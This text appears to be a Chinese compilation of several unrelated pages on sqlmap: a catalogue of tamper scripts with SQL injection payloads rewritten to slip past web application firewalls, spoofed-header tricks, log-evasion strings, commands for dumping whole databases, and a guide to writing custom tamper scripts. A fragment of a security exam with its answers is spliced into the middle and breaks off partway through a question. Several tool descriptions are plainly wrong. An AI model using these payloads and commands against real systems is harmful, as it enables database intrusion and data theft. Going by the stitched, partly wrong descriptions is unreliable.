1,2--+适用数据库：ALLnonrecursivereplacement.py：关键字双写，可用于关键字过滤union select 1,2--+ to uniounionn selecselectt 1,2--+适用数据库：ALLoverlongutf8.py：这个不是很懂，也去网上搜了下，都说是”转换给定的payload 当中的所有字符“，类似空格大于小于这种select field from table where 2>1 to select%C0%AAfield%C0%AAfromtable%C0%AAwhere%C0%AA2 %C0%BE1适用数据库：ALLpercentage.py：用百分号来绕过关键字过滤，具体是在关键字的每个字母前面都加一个百分号select from users to %s%e%l%e%c%t %f%r%o%m %u%s%e%r%s适用数据库：ALL, 但是需要 ASP 环境plus2concat.py：用 concat 函数来替代加号，用于加号被过滤的情况select char(13)+char(114)+char(115) from user to select concat(char(113),char(114),char(115)) from user适用数据库：SQL Server 2012+plus2fnconcat.py：用 fn concat 来替代加号，和上面类似select char(13)+char(114)+char(115) from user to select {fn concat({ fn concat(char(113),char(114))},char(115))} from user 适用数据库：Microsoft SQL Server 2008+randomcase.py：将 payload 随机大小写，可用于大小写绕过的情况union select 1,2--+ to UniOn SElect 1,2--+适用数据库：ALLrandomcomments.py：在 payload 的关键字中间随机插入 /**/ ，可用于绕过关键字过滤union select 1,2--+ to un//ion sele//ct 1,2--+适用数据库：ALLsecuresphere.py：return payload + " and '0having'='0having'" if payload else payload在 payload 后面加入字符串，可以自定义1' and 1=1 to 1' and 1=1 '0having'='0having'适用数据库：ALLsp_password.py：retVal = "%s%ssp_password" % (payload, "-- " if not any(_ if in payload else None for in ('#', "-- ")) else "")在 payload 语句后添加 ssp_password ，用于迷惑数据库日志1’ and 1=1--+ to 1 and 1=1-- sp_password适用数据库：MSSQLspace2comment.py：用 /**/ 替代空格，用于空格的绕过union select 1,2--+ to union//select//1,2--+适用数据库：ALLspace2dash.py：用注释符--和一个随机字符串加一个换行符替换控制符union select 1,2--+ to union--HSHjsJh%0Aselect--HhjHSJ%0A1,2--+适用数据库：MSSQL、 SQLitespace2hash.py：和上面类似，不过这儿是用#注释符union select 1,2--+ to union%23HSHjsJh%0Aselect%23HhjHSJ%0A1,2--+适用数据库：MySQLspace2morecomment.py：将空格用 /_/ 替代union select 1,2--+ to union/_/select/_/1,2--+适用数据库：ALLspace2morehash.py：和 space2hash.py 类似，但是这儿多一个 # 和换行符，具体看一下对比：space2hash.py：union select 1,2--+ to union %23 HSHjsJh %0A select %23 HhjHSJ %0A1,2--+space2morehash.py：union select 1,2--+ to union %23 HSHjsJh %0A select %23 HhjHSJ %0A%23 HJHJhj %0A 1,2--+ 适用数据库：MySQL >= 5.1.13space2mssqlblank.py：blanks = ('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')用这些随机空白符替换 payload 中的空格union select 1,2--+ to union%01select%021,2--+适用数据库：SQL Serverspace2mssqlhash.py：用 # 加一个换行符替换 payload 中的空格union select 1,2--+ to union%23%0Aselect%23%0A1,2--+ 适用数据库：MSSQL、MySQLspace2mysqlblank.py：blanks = ('%09', '%0A', '%0C', '%0D', '%0B')用这些随机空白符替换payload中的空格union select 1,2--+ to union%09select%0D1,2--+适用数据库：MySQLspace2mysqldash.py：用 -- 加一个换行符替换空格union select 1,2--+ to union--%0Aselect--%0A1,2--+适用数据库：MySQL、MSSQLspace2plus.py：用 + 替换空格union select 1,2--+ to union+select+1,2--+适用数据库：ALLspace2randomblank.py：blanks = ("%09", "%0A", "%0C", "%0D")用这些随机空白符替换 payload 中的空格union select 1,2--+ to union%09select%0C1,2--+适用数据库：ALLsymboliclogical.py：retVal = re.sub(r"(?i)bANDb", "%26%26", re.sub(r"(?i)bORb", "%7C%7C", payload))用 && 替换 and ，用 || 替换 or ，用于这些关键字被过滤的情况1 and 1=1 to 1 %26%26 1=11 or 1=1 to 1 %7c%7c 1=1适用数据库：ALLunionalltounion.py：return payload.replace("UNION ALL SELECT", "UNION SELECT") if payload else payload用 union select 替换union all selectunion all select 1,2--+ to union select 1,2--+适用数据库：ALLunmagicquotes.py：用宽字符绕过 GPC addslashes1‘ and 1=1 to 1%df%27 and 1=1--适用数据库：ALLuppercase.py：将 payload 大写union select to UNION SELECT适用数据库：ALLvarnish.py：headers = kwargs.get("headers", {})headers["X-originating-IP"] = "127.0.0.1"return payload添加一个 HTTP 头“ X-originating-IP ” 来绕过 WAF还可以自定义：X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X)X-remote-IP: TARGET_PROXY_IP (184.189.250.X)X-originating-IP: TARGET_LOCAL_IP (127.0.0.1)x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X)X-remote-IP: * or %00 or %0A适用数据库：ALLversionedkeywords.py对不是函数的关键字进行注释1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USE R() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#to1/!UNION//!ALL//!SELECT//!NULL/,/!NULL/,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USE R()/!AS//!CHAR/),CHAR(32)),CHAR(58,100,114,117,58))# 适用数据库：MySQLversionedmorekeywords.py：注释每个关键字1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USE R() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#to1/!UNION//!ALL//!SELECT//!NULL/,/!NULL/,/!CONCAT/(/!CH AR/(58,122,114,115,58),/!IFNULL/(CAST(/!CURRENT_USER/()/!AS //!CHAR/),/!CHAR/(32)),/!CHAR/(58,115,114,121,58))#适用数据库：MySQL >= 5.1.13xforwardedfor.py：headers = kwargs.get("headers", {})headers["X-Forwarded-For"] = randomIP()return payload添加一个伪造的 HTTP 头“ X-Forwarded-For ” 来绕过 WAF 适用数据库：ALL总结虽然sqlmap 自带的tamper 可以做很多事情，但是在实际的环境中，往往比较复杂，可能遇到的情况会非常多，这些tamper 不可能做到很全面的应对各种环境，所以在学习自带的tamper 的使用的同时，最好能够掌握tamper 的编写规则，这样应对各种环境才能应对自如，不过作者也在准备这么一篇关于tamper 的编写方式，希望可以帮到更多的同学，让我们在学习的路上不是孤军奋战。

网络安全管理员考试题与答案一、单选题（共70题，每题1分，共70分）1、以下方法中，不适用于检测计算机病毒的是(____)。

A、校验和法B、特征代码法C、加密D、软件模拟法正确答案：C2、防火墙默认有4个安全区域，安全域优先级从高到低的排序是(____)。

A、Trust、Untrust、DMZ、LocalB、Local、DMZ、Trust、UntrustC、Local、Trust、DMZ、UntrustD、Trust、Local、DMZ、Untrust正确答案：C3、一名攻击者试图通过暴力攻击来获取下列(____)信息。

A、加密算法B、密文C、公钥D、加密密钥正确答案：D4、LOG文件在注册表的位置是(____)。

A、HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\EventlogB、HKEY_LOCAL_USER\System\CurrentControlSet\ServiCes\EventlogC、HKEY_LOCAL_MACHINE\System32\CurrentControlSet\ServiCes\EventlogD、HKEY_LOCAL_MACHINE\System\CurrentControlSet\ServiCes\run正确答案：A5、关于黑客注入攻击说法错误的是(____)。

A、注入成功后可以获取部分权限B、对它进行防范时要关注操作系统的版本和安全补丁C、它的主要原因是程序对用户的输入缺乏过滤D、一般情况下防火墙对它无法防范正确答案：B6、包过滤依据包的源地址、目的地址、传输协议作为依据来确定数据包的转发及转发到何处。

它不能进行如下(____)操作。

A、禁止外部网络用户使用FTPB、允许所有用户使用HTTP浏览INTERNETC、除了管理员可以从外部网络Telnet内部网络外，其他用户都不可以D、只允许某台计算机通过NNTP发布新闻正确答案：C7、用来追踪DDoS流量的命令是(____)。

sqlmap 使用方法SQLMap 是一个用于自动化的注入 SQL 数据库的检测和攻击工具。

它是一个开源的Web应用程序安全软件，用于检测和利用SQL注入漏洞，并可以帮助攻击者得到数据库的内容。

本文将介绍 SQLMap 的使用方法。

一、安装SQLMap1.下载SQLMap首先，您可以从GitHub下载SQLMap。

2.安装SQLMap您可以在Linux服务器或Windows本地机器上安装SQLMap。

在安装过程中，您可以在命令行提示符中输入以下内容：python sqlmap.py -h二、SQLMap 命令使用1.参数SQLMap 有很多可用参数，可以帮助我们针对不同的SQL注入活动，您可以在命令行提示符上输入以下内容：python sqlmap.py--help2.测试注入一旦你安装完SQLMap，你可以使用以下命令来测试注入：python sqlmap.py -u url --data='querystring' --dbms=value3.探测表和列如果SQLMap发现数据库注入，您可以试图探测数据库中的表和列，命令为：python sqlmap.py -u url --dbms=value--tamper=random --dump --dump-all4.获取数据最后，如果您想从数据库中获取数据，您可以使用以下命令：python sqlmap.py -u url --dbms=value --tables --dump-all三、SQLMap 技巧1.检测全部参数：您可以使用--data参数，来检测所有参数，以找出可能的SQL注入点2.隐藏检测过程：您可以使用--level参数，来指定要检测的参数等级，这样可以把检测过程隐藏起来3.使用Tamper脚本：Tamper脚本可以帮助你修改请求，以通过WAF，使攻击更隐蔽4.自定义用户代理：您可以使用--user-agent参数，来设置自定义的用户代理字符串，以更完美地模仿真实用户5.指定表和列：您可以使用--tables参数，来指定你想要抽取的表，--columns参数，来指定你想要抽取的列以上就是关于SQLMap 使用方法的介绍，希望对您有所帮助。

SQLmap中tamper的套用与编写导语：tamper脚本不全，没有想要的功能，那就套用别人的思路改一个吧，不行，那就自己编一个………为了说明tamper的结构，让我们从一个最简单的例子开始为了说明tamper的结构，让我们从一个最简单的例子开始# sqlmap/tamper/escapequotes.pyfromlib.core.enums import PRIORITY__priority__ = PRIORITY.LOWESTdef dependencies():passdef tamper(payload, **kwargs):returnpayload.replace("'", "\\'").replace('"', '\\"')不难看出，一个最小的tamper脚本结构为priority变量定义和dependencies、tamper函数定义。

priority定义脚本的优先级，用于有多个tamper脚本的情况。

dependencies函数声明该脚本适用/不适用的范围，可以为空。

tamper是主要的函数，接受的参数为payload和**kwargs返回值为替换后的payload。

比如这个例子中就把引号替换为了\\'。

我们在选一个脚本，该脚本为base64encode.py，查看脚本中的tamper内容：可以看到内容非常简单，将payload的内容内容做了base64编码然后直接返回。

Tamper 有两个参数第一个参数payload即为传入的实际要操作的payload，第二个参数**kwargs 为相关httpheader。

譬如你想插入或则修改header的时候可以用到。

逻辑流程弄清楚之后，很容易编写自己的tamper脚本了。

以使用%a0替换空格的脚本为例，在tamper目录下创建space2ao.py脚本，稍微修改下脚本：在tamper里面再找一个插件，我们来分析分析他的构成。

SQLMap是一个自动化的SQL注入和数据库获取工具。

它使用Python编写，具有强大的功能和灵活性。

以下是SQLMap的一些常用参数及其用法：1.-u：指定要测试的URL。

例如：-u2.-d：指定要连接的数据库类型。

例如：-d mysql3.--dbs：列出所有可用的数据库。

4.-D：指定要测试的数据库。

例如：-D mydatabase5.--tables：列出指定数据库中的所有表。

6.-T：指定要测试的表。

例如：-T users7.--columns：列出指定表中的所有列。

8.-C：指定要测试的列。

例如：-C id,username,password9.--dump：导出指定表中的数据。

10.-r：从文件中加载HTTP请求。

例如：-r request.txt11.--level：指定测试等级（1-5），默认值为1。

增加等级将执行更多的测试和攻击。

12.--risk：指定风险等级（0-3），默认值为1。

增加风险等级将尝试更危险的攻击。

13.--batch：自动执行所有测试，无需用户交互。

14.--tamper：使用指定的脚本对请求进行修改或绕过安全措施。

例如：--tamper=space2comment15.--proxy：使用代理服务器进行连接。

例如：--proxy--tor：使用Tor网络进行连接。

16.--delay：在发送请求之间设置延迟（秒）。

例如：--delay 517.--timeout：设置请求超时时间（秒）。

例如：--timeout 1018.--random-agent：随机选择User-Agent头进行请求。

19.--threads：指定并发线程数。

例如：--threads 10这些参数可以根据需要进行组合使用，以实现不同的测试场景和攻击策略。

请注意，在使用SQLMap进行渗透测试之前，确保已经获得了目标系统的合法授权，并遵守相关法律法规。

sqlmap常⽤脚本SQLMap常⽤脚本SQLMap的脚本都存放在安装⽬录的tamper⽂件夹中调⽤⽅法 --temp xxx.py xxx.py可加双引号也可不加可尝试脚本名称作⽤说明apostrophemask.py将引号替换成UTF-8，⽤于过滤单引号base64encode.py替换成base64编码multiplespaces.py围绕SQL关键字添加多个空格space2plus.py⽤+号代替空格nonrecursivereplacement.py作为双重查询语句，⽤双重语句替换预定义的SQL关键字space2randomblank.py将空格替换为其他有效字符unionalltounion.py将union all select 替换成union selectsecuresphere.py追加特制的字符串space2hash.py将空格替换为#号，并添加⼀个随机字符串和换⾏符space2mssqlblank.py(mssql)将空格替换成其他空符号space2mssqlhash.py将空格替换为#号，并添加⼀个换⾏符between.py⽤not between 0 and替换⼤于号，⽤between and替换等于号percentage.py ASP允许每个字符前⾯添加%号sp_password.py从DBMS⽇志的⾃动模糊处理的有效载荷追加sp_passwordcharencode.py对给定的payload全部字符使⽤URL编码randomcase.py随机⼤⼩写charunicodeencode.py字符串Unicode编码space2comment.py将空格替换成/**/equaltolike.py将等号替换为likegreatest.py绕过对⼤于号的过滤，⽤GREATEST替换⼤于号ifnull2ifsnull.py绕过对ifnull的过滤，替换类似IFNULL(A,B)为IF(ISNULL(A),B,A) modsecurityversioned.py过滤空格，使⽤MySQL内联注释的⽅式进⾏注⼊space2mysqlblank.py将空格替换为其他空⽩符号(适⽤于MySQL)modsecurityzeroversioned.py使⽤MySQL内联注释的⽅式进⾏注⼊space2mysqlhash.py将空格替换为–，并添加⼀个换⾏符bluecoat.py在SQL语句之后⽤有效的随机空⽩替换空格符，随后⽤like替换等于号versionedkeywords.py注释绕过halfversionedmorekeywords.py当数据库为MySQL时绕过防⽕墙，在每个关键字之前添加MySQL版本注释space2moreshash.py将空格替换为#号，并添加⼀个随机字符串和换⾏符apostrphenullencode.py⽤⾮法双字节Unicode字符替换单引号appendnullbyte.py在有效负荷的结束位置加载零字节字符编码chardoubleencode.py对给定的payload全部字符使⽤双重url编码unmagicquotes.py⽤⼀个多字节组合和末尾通⽤注释⼀起替换空格randomcomments.py⽤/**/分割SQL关键字。

sqlmap tamper url编码Sqlmap是一款常用的自动化SQL注入工具。

在渗透测试中，它可以通过检测目标的漏洞并利用它们来获取目标的数据或获取对目标的控制。

其中一个常见的注入形式是对URL进行编码。

下面我将介绍如何用Sqlmap来对编码过的URL进行注入。

首先，要使用Sqlmap，需要按照其官方说明进行安装和配置。

通常情况下，我们需要指定目标URL、参数名称和注入方式等信息。

对于编码过的URL，我们需要在URL中添加“--tamper”，然后指定一个tamper脚本。

下面是一个用于URL编码的tamper脚本：```# coding: utf-8def tamper(payload, **kwargs):payload = payload.replace("http%3A%2F%2F", "http://")payload = payload.replace("https%3A%2F%2F", "https://") payload = payload.replace("%2F", "/")payload = payload.replace("%3F", "?")payload = payload.replace("%3D", "=")return payload```这个脚本对URL中的编码字符进行了还原，将其替换为对应的字符。

我们可以将脚本保存为“urlencode.py”，然后在Sqlmap的命令行中使用以下参数来进行注入：```python sqlmap.py -u "/page?id=1%20and%201=1" --tamper urlencode.py```在命令中，“--tamper”指定了我们刚刚编写的脚本。

sqlmap tamper 注释符SQLMap是一款非常强大的自动化SQL注入工具，它能够检测并利用Web应用程序中的SQL注入漏洞。

而tamper注释符是SQLMap中用于对注入数据进行修改和混淆的一种技术，通过对注入数据进行特定的处理，可以绕过一些安全机制和过滤规则，从而成功利用SQL 注入漏洞。

tamper注释符是SQLMap中的一种技术，它可以对注入数据进行特定的处理，以绕过一些安全机制和过滤规则。

通过使用tamper注释符，可以对注入数据进行编码、加密、混淆等操作，从而达到绕过防御机制的目的。

tamper注释符可以通过在payload中添加特定的注释符来实现。

注释符通常是一些特殊字符或字符串，SQLMap会根据这些注释符对注入数据进行处理。

例如，可以使用"--"来表示注释，SQLMap会将注释符后面的内容忽略掉。

另外，还可以使用一些编码和加密的注释符，如URL编码、Base64编码等，以混淆注入数据，绕过安全机制。

除了注释符，tamper还可以通过修改注入数据的方式来绕过安全机制。

例如，可以通过在注入数据中添加HTML标签、特殊字符等来绕过输入过滤和输出过滤。

此外，还可以使用一些特殊的SQL语句和函数来绕过SQL防火墙和WAF。

tamper注释符的使用需要根据具体的注入场景和目标应用程序来选择合适的注释符和处理方式。

在使用tamper注释符时，需要注意以下几点：要根据目标应用程序的特点和防御机制选择合适的注释符和处理方式。

不同的应用程序可能有不同的过滤规则和防御机制，需要根据具体情况选择合适的注释符和处理方式。

要注意注释符的使用位置和方式。

注释符通常需要添加在注入数据的特定位置，才能起到绕过防御机制的作用。

此外，注释符还需要与其他tamper选项结合使用，以达到最佳的注入效果。

要注意tamper注释符可能会对注入数据产生影响。

在使用tamper 注释符时，需要确保注入数据仍然有效，不会导致注入失败或产生错误结果。

注⼊神器sqlmap命令⼤全详解强⼤的SQL注⼊⼯具——SQLMAP Akast [N.S.T] 1. 前⾔Windows下的注⼊⼯具好的⼜贵，免费的啊D、明⼩⼦等⼜不好⽤，我们根本没必要花时间去找什么破解的havij、pangolin什么的，特别是破解的⼯具很可能被绑了⽊马。

其实 Linux下的注⼊⼯具也是⾮常强⼤的，不过分的说，可以完全取代Windows下⾯的所有注⼊⼯具。

就如backtrack系统⾥⾯就有⾮常丰富的注⼊⼯具，对MSSQL、MYSQL、oracle等各种数据库的应有尽有了，⽽且这些⼯具都是免费的，并且是开放源代码的，我们还可以⽤来修改为合适⾃⼰使⽤的注⼊⼯具。

本⽂给⼤家介绍的SqlMap是⼀个开放源码的渗透测试⼯具，它可以⾃动探测和利⽤SQL 注⼊漏洞来接管数据库服务器。

它配备了⼀个强⼤的探测引擎，为最终渗透测试⼈员提供很多猥琐的功能，可以拖库，可以访问底层的⽂件系统，还可以通过带外连接执⾏操作系统上的命令。

2. SQLMAP命令详解为了⽅便使⽤我把sqlmap的选项都翻译出来了，当然可能会存在⼀些不恰当的地⽅，请⼤家指出，可以给我发邮件：akast@。

如果我有时间会把这个⼯具出个中⽂版。

Options（选项）：--version 显⽰程序的版本号并退出 -h, --help 显⽰此帮助消息并退出 -v VERBOSE 详细级别：0-6（默认为1）Target（⽬标）：以下⾄少需要设置其中⼀个选项，设置⽬标URL。

-d DIRECT 直接连接到数据库。

-u URL, --url=URL ⽬标URL。

-l LIST 从Burp或WebScarab代理的⽇志中解析⽬标。

-r REQUESTFILE 从⼀个⽂件中载⼊HTTP请求。

-g GOOGLEDORK 处理Google dork的结果作为⽬标URL。

-c CONFIGFILE 从INI配置⽂件中加载选项。

Request（请求）：:这些选项可以⽤来指定如何连接到⽬标URL。

sqlmap tamper 参数sqlmaptamper参数是一组可用于修改SQL注入负载的参数，以便更好地规避WAF（Web应用程序防火墙）和其他安全措施的工具。

tamper参数允许使用者指定一组自定义规则和规则文件，以便在注入时自动修改负载。

这些规则可以用于绕过WAF、绕过防火墙和防止检测。

sqlmap tamper 参数的使用方法非常简单。

只需要在sqlmap命令行中使用“--tamper”选项，后跟您要使用的规则或规则文件的名称即可。

所有规则都被放置在tamper目录中。

以下是一些可用的tamper规则：1. apostrophemask.py此规则使用了一个简单的技巧，在负载中使用双引号代替单引号，从而绕过检测。

2. base64encode.py此规则使用Base64编码算法对负载进行编码，从而绕过检测。

3. between.py此规则使用了BETWEEN语句而不是常规的等于号，以规避检测。

4. bluecoat.py此规则使用了Bluecoat的特殊功能，以绕过SNORT和其他IDS的检测。

5. chardoubleencode.py此规则使用了HTML实体的双重编码技巧，以绕过检测。

6. charunicodeencode.py此规则使用了Unicode编码技巧，以绕过检测。

7. comma.py此规则使用了逗号而不是常规的等于号，以规避检测。

8. equaltolike.py此规则使用了LIKE表达式而不是等于号，以规避检测。

总之，sqlmap tamper 参数是一个非常有用的工具，可以用于绕过WAF、防火墙和其他安全措施，以便更好地执行SQL注入攻击。